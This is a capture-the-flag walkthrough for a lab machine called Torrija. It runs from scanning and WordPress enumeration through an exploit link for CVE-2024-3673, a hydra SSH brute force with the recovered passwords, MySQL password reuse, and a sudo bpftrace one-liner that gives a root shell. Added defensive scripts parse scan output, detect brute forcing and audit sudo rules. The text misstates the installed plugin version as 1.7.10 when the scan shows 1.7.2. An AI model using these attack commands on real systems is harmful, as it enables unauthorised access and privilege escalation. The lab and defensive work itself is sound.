Torrijas


Information gathering

192.168.43.42

Port scan

┌──(root㉿kali)-[~]
└─# rustscan -a 192.168.43.42
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.43.42:22
Open 192.168.43.42:80
Open 192.168.43.42:3306
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-08 09:02 EDT
Initiating Ping Scan at 09:02
Scanning 192.168.43.42 [4 ports]
Completed Ping Scan at 09:02, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:02
Completed Parallel DNS resolution of 1 host. at 09:02, 0.32s elapsed
DNS resolution of 1 IPs took 0.32s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 09:02
Scanning 192.168.43.42 [3 ports]
Discovered open port 3306/tcp on 192.168.43.42
Discovered open port 22/tcp on 192.168.43.42
Discovered open port 80/tcp on 192.168.43.42
Completed SYN Stealth Scan at 09:02, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.43.42
Host is up, received reset ttl 128 (0.00058s latency).
Scanned at 2026-04-08 09:02:20 EDT for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 128
80/tcp open http syn-ack ttl 128
3306/tcp open mysql syn-ack ttl 128

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
Raw packets sent: 7 (284B) | Rcvd: 4 (172B)

Enumeration

Directory scan

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.43.42/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,wsp,py,js,phps --exclude-length 278
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.43.42/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 278
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,wsp,py,js,phps,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 20833]
/images (Status: 301) [Size: 315] [--> http://192.168.43.42/images/]
/contact.html (Status: 200) [Size: 7285]
/about.html (Status: 200) [Size: 5574]
/css (Status: 301) [Size: 312] [--> http://192.168.43.42/css/]
/wordpress (Status: 301) [Size: 318] [--> http://192.168.43.42/wordpress/]
/js (Status: 301) [Size: 311] [--> http://192.168.43.42/js/]
/recipes.html (Status: 200) [Size: 7565]
/testimonial.html (Status: 200) [Size: 8901]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

There is a WordPress install under /wordpress.

Use wpscan to enumerate plugins that may be exploitable.

┌──(root㉿kali)-[~]
└─# wpscan --url http://192.168.43.42/wordpress/ --enumerate ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.



[+] URL: http://192.168.43.42/wordpress/ [192.168.43.42]
[+] Started: Wed Apr 8 09:18:15 2026

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.62 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.43.42/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.43.42/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.43.42/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.43.42/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.2 identified (Outdated, released on 2025-02-11).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.43.42/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.43.42/wordpress/, Match: 'WordPress 6.7.2'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:56 <===========================================================================================> (111886 / 111886) 100.00% Time: 00:00:56
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.43.42/wordpress/wp-content/plugins/akismet/
| Last Updated: 2025-07-15T18:17:00.000Z
| Readme: http://192.168.43.42/wordpress/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.5
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.43.42/wordpress/wp-content/plugins/akismet/, status: 200
|
| Version: 5.3.6 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.43.42/wordpress/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.43.42/wordpress/wp-content/plugins/akismet/readme.txt

[+] web-directory-free
| Location: http://192.168.43.42/wordpress/wp-content/plugins/web-directory-free/
| Last Updated: 2025-04-16T16:43:00.000Z
| Readme: http://192.168.43.42/wordpress/wp-content/plugins/web-directory-free/readme.txt
| [!] The version is out of date, the latest version is 1.7.10
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.43.42/wordpress/wp-content/plugins/web-directory-free/, status: 200
|
| Version: 1.7.2 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.43.42/wordpress/wp-content/plugins/web-directory-free/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Apr 8 09:19:18 2026
[+] Requests Done: 111896
[+] Cached Requests: 32
[+] Data Sent: 32.397 MB
[+] Data Received: 15 MB
[+] Memory used: 398.43 MB
[+] Elapsed time: 00:01:02

Two plugins are present, akismet and web-directory-free; the web-directory-free plugin, whose version is 1.7.10, is affected by CVE-2024-3673.
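Reading plugin names, versions and "out of date" markers by eye out of a long wpscan run is error-prone, which is how the version numbers above can get mixed up. The following is an added example, not code from the page or from the WPScan project: it parses the plugin section of wpscan's text output into records and flags each plugin that is behind the latest release or has directory listing enabled, so an administrator scanning their own site gets a patch list rather than a wall of text. The sample excerpt embedded below is constructed to mirror the scan output above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: an excerpt shaped like the "Plugin(s) Identified" section
# of a wpscan run (values mirror the scan output above).
SAMPLE_WPSCAN = """\
[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.43.42/wordpress/wp-content/plugins/akismet/
 | [!] The version is out of date, the latest version is 5.5
 |
 | Version: 5.3.6 (100% confidence)

[+] web-directory-free
 | Location: http://192.168.43.42/wordpress/wp-content/plugins/web-directory-free/
 | [!] The version is out of date, the latest version is 1.7.10
 | [!] Directory listing is enabled
 |
 | Version: 1.7.2 (80% confidence)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
"""


@dataclass
class Plugin:
    name: str
    version: Optional[str] = None
    latest: Optional[str] = None
    confidence: Optional[int] = None
    directory_listing: bool = False


def version_tuple(v: str):
    """Turn '1.7.10' into (1, 7, 10) so that comparisons are numeric, not lexical."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def is_outdated(p: Plugin) -> bool:
    """True when wpscan reported a newer release than the one detected."""
    if p.version is None or p.latest is None:
        return False
    return version_tuple(p.version) < version_tuple(p.latest)


def parse_plugins(text: str) -> List[Plugin]:
    """Extract plugin records from the plugin section of wpscan text output."""
    plugins: List[Plugin] = []
    current: Optional[Plugin] = None
    in_section = False
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("[i] Plugin(s) Identified"):
            in_section = True
            continue
        if not in_section:
            continue
        m = re.match(r"\[\+\] (\S+)$", s)          # "[+] <plugin-slug>" starts a block
        if m:
            current = Plugin(name=m.group(1))
            plugins.append(current)
            continue
        if current is None or not s.startswith("|"):
            if s.startswith("[!]") or s.startswith("[+]"):
                current = None                     # a non-plugin line ends the section
            continue
        body = s.lstrip("|").strip()               # detail lines are "| key: value"
        m = re.match(r"Version: (\S+) \((\d+)% confidence\)", body)
        if m:
            current.version, current.confidence = m.group(1), int(m.group(2))
        m = re.match(r"\[!\] The version is out of date, the latest version is (\S+)", body)
        if m:
            current.latest = m.group(1)
        if body == "[!] Directory listing is enabled":
            current.directory_listing = True
    return plugins


def findings(plugins: List[Plugin]) -> List[dict]:
    """One row per plugin that needs action: update needed and/or listing exposed."""
    out = []
    for p in plugins:
        outdated = is_outdated(p)
        if outdated or p.directory_listing:
            out.append({"plugin": p.name, "installed": p.version, "latest": p.latest,
                        "outdated": outdated, "directory_listing": p.directory_listing})
    return out


if __name__ == "__main__":
    for row in findings(parse_plugins(SAMPLE_WPSCAN)):
        print(row)
```

The `(80% confidence)` figure is kept on purpose: wpscan derives the installed version from the readme's stable tag, so a plugin reported at less than 100% should be confirmed from the server's own files before a vulnerability is assumed.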

Download the exploit: https://github.com/Nxploited/CVE-2024-3673/blob/main/CVE-2024-3673.py

Read /etc/passwd

There are three users under /home; try brute-forcing SSH with hydra.

primo

debian

premo

┌──(root㉿kali)-[/opt/CVE]
└─# hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.43.42 ssh -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-04-08 09:41:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 43033197 login tries (l:3/p:14344399), ~672394 tries per task
[DATA] attacking ssh://192.168.43.42:22/
[STATUS] 549.00 tries/min, 549 tries in 00:01h, 43032690 to do in 1306:24h, 22 active
[22][ssh] host: 192.168.43.42 login: premo password: cassandra
[STATUS] 4781545.67 tries/min, 14344637 tries in 00:03h, 28688602 to do in 00:06h, 22 active
[STATUS] 2049385.14 tries/min, 14345696 tries in 00:07h, 28687550 to do in 00:14h, 15 active
[STATUS] 1195585.58 tries/min, 14347027 tries in 00:12h, 28686219 to do in 00:24h, 15 active

user.txt holds the three usernames.

premo:cassandra
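The hydra run above generates thousands of failed password attempts per minute from a single source, which is exactly the pattern the target's own sshd log records. The following is an added example from the defender's side, not code from the page: it parses sshd lines of the kind written to /var/log/auth.log, keeps a sliding window of failures per source address, raises an alert when the window crosses a threshold, and raises a second, higher-value alert when a successful login follows a burst of failures from the same source (the signal that a password was found). The log lines, host name, source addresses and year are constructed for the example; the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import List, Optional

# Constructed sample auth.log lines (not from the page): a burst of failures from
# one source against the three accounts, then a success for one of them, then an
# unrelated key-based login from another address.
SAMPLE_AUTH_LOG = """\
Apr  8 09:41:23 torrija sshd[1201]: Failed password for primo from 192.168.43.10 port 50212 ssh2
Apr  8 09:41:23 torrija sshd[1202]: Failed password for invalid user debian from 192.168.43.10 port 50213 ssh2
Apr  8 09:41:24 torrija sshd[1203]: Failed password for premo from 192.168.43.10 port 50214 ssh2
Apr  8 09:41:24 torrija sshd[1204]: Failed password for primo from 192.168.43.10 port 50215 ssh2
Apr  8 09:41:25 torrija sshd[1205]: Failed password for premo from 192.168.43.10 port 50216 ssh2
Apr  8 09:41:25 torrija sshd[1206]: Failed password for invalid user debian from 192.168.43.10 port 50217 ssh2
Apr  8 09:41:26 torrija sshd[1207]: Accepted password for premo from 192.168.43.10 port 50218 ssh2
Apr  8 09:50:01 torrija sshd[1300]: Accepted publickey for primo from 192.168.43.20 port 40000 ssh2
"""

# syslog timestamp, host, "sshd[pid]:", then the sshd authentication message
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_line(line: str, year: int = 2026) -> Optional[dict]:
    """Return a structured event, or None for lines that are not sshd auth results.
    Syslog timestamps carry no year, so the caller supplies one (assumed here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines: List[str], threshold: int = 5, window_s: int = 60) -> List[dict]:
    """Sliding-window detector: per source address, count failures inside window_s
    seconds; alert once when the count reaches threshold, and alert again if a
    login from that source succeeds after such a burst."""
    failures = defaultdict(list)       # src -> timestamps of recent failures
    alerts = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        recent = failures[e["src"]]
        if e["result"] == "Failed":
            recent.append(e["ts"])
            # expire failures that fell out of the window
            while recent and (e["ts"] - recent[0]).total_seconds() > window_s:
                recent.pop(0)
            if len(recent) == threshold:          # fire once per burst, not per line
                alerts.append({"type": "bruteforce", "src": e["src"],
                               "count": len(recent), "at": e["ts"]})
        elif len(recent) >= threshold:            # Accepted after a burst: likely a hit
            alerts.append({"type": "success_after_bruteforce", "src": e["src"],
                           "user": e["user"], "method": e["method"], "at": e["ts"]})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(a)
```

The second alert type is the one worth paging on: a lone burst of failures is noise on any internet-facing host, but an accepted password from an address that was just guessing means the account should be treated as compromised. The structural fix is the usual one, key-only authentication (`PasswordAuthentication no`) plus rate limiting such as fail2ban, after which the first alert type mostly disappears.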

Privilege escalation

premo -> primo

ssh premo@192.168.43.42

In premo's home directory there is a MySQL history file; logging in to MySQL requires a username and password.

Reading /var/www/html/wordpress/wp-config.php gives the database username and password.

Log in to MySQL

mysql -uadmin -pafdvasgvfdsabdgvs6a9vd8sv

Nothing else of interest; the databases are all WordPress ones.

Suspecting password reuse, trying the same password with the root username shows that it logs in.

mysql -uroot -pafdvasgvfdsabdgvs6a9vd8sv


This yields primo's user password:

primo:queazeshurmano

primo -> root

primo@Torrija-TheHackersLabs:/home/premo$ sudo -l
sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido
Matching Defaults entries for primo on Torrija-TheHackersLabs:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User primo may run the following commands on Torrija-TheHackersLabs:
(root) NOPASSWD: /usr/bin/bpftrace

bpftrace can be used to escalate privileges:

https://gtfobins.org/gtfobins/bpftrace/

sudo /usr/bin/bpftrace --unsafe -e 'BEGIN {system("/bin/sh 1<&0");exit()}'
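The root cause here is a sudoers rule that lets an unprivileged user run bpftrace as root without a password; bpftrace's `--unsafe` mode allows the traced program to call `system()`, so the rule is equivalent to a root shell. The following is an added example, not code from the page or from GTFOBins: an audit that parses the text `sudo -l` prints, turns each rule into a record, and reports rules that grant an unrestricted command, skip authentication (NOPASSWD), or point at a binary known to hand out command execution. The `sudo -l` sample is constructed to mirror the output above with two extra rules added for contrast, and the `SHELL_CAPABLE` set is seeded only with the binary this page discusses; extend it from your own review.

```python
import re
from typing import List

# Constructed sample of `sudo -l` output (modelled on the page's; the systemctl
# and ALL rules are added for illustration).
SAMPLE_SUDO_L = r"""
Matching Defaults entries for primo on Torrija-TheHackersLabs:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User primo may run the following commands on Torrija-TheHackersLabs:
    (root) NOPASSWD: /usr/bin/bpftrace
    (root) /usr/bin/systemctl restart apache2
    (ALL : ALL) ALL
"""

# Binaries that give the run-as user arbitrary command execution. Seeded with the
# one the page discusses (bpftrace --unsafe exposes system()); add others you verify.
SHELL_CAPABLE = {"bpftrace"}

# "(runas) TAG: TAG: command ..." as printed by sudo -l
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(text: str) -> List[dict]:
    """Return one record per rule listed under 'may run the following commands'."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("User ") and "may run the following commands" in s:
            in_rules = True
            continue
        if not in_rules or not s:
            continue
        m = RULE_RE.match(s)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        cmd = m["cmd"].strip()
        binary = cmd.split()[0].rsplit("/", 1)[-1]      # 'ALL' stays 'ALL'
        rules.append({"runas": m["runas"].strip(), "nopasswd": "NOPASSWD" in tags,
                      "command": cmd, "binary": binary})
    return rules


def audit(rules: List[dict]) -> List[dict]:
    """Flag rules an administrator should revisit, with the reasons and a severity."""
    out = []
    for r in rules:
        reasons = []
        if r["command"] == "ALL":
            reasons.append("unrestricted command (ALL)")
        if r["nopasswd"]:
            reasons.append("NOPASSWD: no authentication at time of use")
        if r["binary"] in SHELL_CAPABLE:
            reasons.append(f"{r['binary']} can execute arbitrary commands as {r['runas']}")
        if reasons:
            high = r["command"] == "ALL" or r["binary"] in SHELL_CAPABLE
            out.append({"rule": r["command"], "runas": r["runas"],
                        "severity": "high" if high else "medium", "reasons": reasons})
    return out


if __name__ == "__main__":
    for f in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f["severity"], f["rule"], "->", "; ".join(f["reasons"]))
```

For this box the remediation is to drop the bpftrace rule entirely, or, if an operator genuinely needs to run tracing scripts, to grant sudo on a fixed wrapper script that invokes bpftrace with a vetted program and never passes `--unsafe`; a rule on the bare binary cannot be restricted by argument matching in any useful way.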
